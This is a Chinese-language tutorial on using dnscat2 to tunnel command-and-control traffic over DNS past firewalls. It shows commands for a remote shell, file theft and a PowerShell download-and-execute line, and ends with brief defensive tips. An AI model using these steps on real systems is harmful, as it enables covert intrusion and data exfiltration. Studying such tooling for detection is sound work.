DNScat2:利用DNS隧道绕过防火墙

0x01 概述

内网出口一般对出站流量做了严格限制,但是通常不会限制DNS请求,也就是UDP 53请求,dnscat2就是一款利用DNS协议创建加密C&C通道来控制服务器的工具。dnscat2由客户端和服务端两部分组成。

当运行客户端时,需要指定一个域名。所有请求都将发送到本地DNS服务器,然后将转发至该域的权威DNS服务器。

如果你没有一个权威的DNS服务器,你也可以在直接连接UDP的53端口。这样速度更快,而且看起来仍然像普通的DNS查询,但是在请求日志中所有域名都是以dnscat开头。这种模式经常会被防火墙阻止。

服务端需要在权威DNS服务器上运行,与Client相同,需要指定域名。

 

0x02 部署

客户端

$ git clone https://github.com/iagox86/dnscat2.git

$ cd dnscat2/client/

$ make

服务端

yum install rubygems

gem install bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

 

0x03 使用

如果目标内网放行了所有的DNS请求,那么就可以直接指定HOST,通过UDP 53端口通信。

而如果目标内网只允许和受信任的DNS服务器通信时就需要申请注意域名,并将运行dnscat2 server的服务器指定为权威DNS服务器。这里我们以第一种情况为例:

 

服务端执行ruby ./dnscat2.rb

root@kali:/tmp/dnscat2/server# ruby ./dnscat2.rb



New window created: 0

New window created: crypto-debug

dnscat2> Welcome to dnscat2! Some documentation may be out of date.



auto_attach => false

history_size (for new windows) => 1000

Security policy changed: All connections must be encrypted

New window created: dns1

Starting Dnscat2 DNS server on 0.0.0.0:53

[domains = n/a]...



It looks like you didn't give me any domains to recognize!

That's cool, though, you can still use direct queries,

although those are less stealthy.



To talk directly to the server without a domain name, run:



  ./dnscat --dns server=x.x.x.x,port=53 --secret=eca54e475210239dc87a7c9f2516c89a



Of course, you have to figure out <server> yourself! Clients

will connect directly on UDP port 53.

客户端执行:

[root@vincenthostname client]# ./dnscat --dns server=172.16.100.182,port=53 --secret=eca54e475210239dc87a7c9f2516c89a

Creating DNS driver:

 domain = (null)

 host   = 0.0.0.0

 port   = 53

 type   = TXT,CNAME,MX

 server = 172.16.100.182



** Peer verified with pre-shared secret!



Session established!

然后服务端可以看到连接建立

New window created: 1

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

dnscat2> session -i 1

New window created: 1

history_size (session) => 1000

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a command session!



That means you can enter a dnscat2 command such as

'ping'! For a full list of clients, try 'help'.

查看支持的命令

command (vincenthostname) 1> help



Here is a list of commands (use -h on any of them for additional help):

* clear

* delay

* download

* echo

* exec

* help

* listen

* ping

* quit

* set

* shell

* shutdown

* suspend

* tunnels

* unset

* upload

* window

* windows

Shell环境

command (vincenthostname) 1> shell

Sent request to execute a shell

command (vincenthostname) 1> New window created: 2

Shell session created!



command (vincenthostname) 1> session -i 2

New window created: 2

history_size (session) => 1000

Session 2 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a console session!



That means that anything you type will be sent as-is to the

client, and anything they type will be displayed as-is on the

screen! If the client is executing a command and you don't

see a prompt, try typing 'pwd' or something!



To go back, type ctrl-z.



sh (vincenthostname) 2> whoami

sh (vincenthostname) 2> root

sh (vincenthostname) 2> cat /etc/issue

sh (vincenthostname) 2> CentOS release 6.5 (Final)

Kernel \r on an \m

下载文件

command (vincenthostname) 1> download /tmp/1.sh

Attempting to download /tmp/1.sh to 1.sh

command (vincenthostname) 1> Wrote 51 bytes from /tmp/1.sh to 1.sh!

root@kali:/tmp/dnscat2/server# ls 1.sh

1.sh

通信数据包如下:

可以看到域名是dnscat开头

 

0x04 使用PowerShell客户端通信

服务端

ruby ./dnscat2.rb --dns "domain=test,host=172.16.100.182" --no-cache

客户端

下载地址:https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1

powershell下执行

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Start-Dnscat2 -Domain test -DNSServer 172.16.100.182

 

0x05 防御

1)防火墙上限制只允许与受信任的 DNS 服务器通信

2)上文提到默认的dnscat查询中包含了dnscat字符串,这个可以作为防火墙和入侵检测的特征

3)记录DNS查询日志,通过频率、长度、类型监控异常日志

 

参考文章:

https://www.anquanke.com/post/id/85764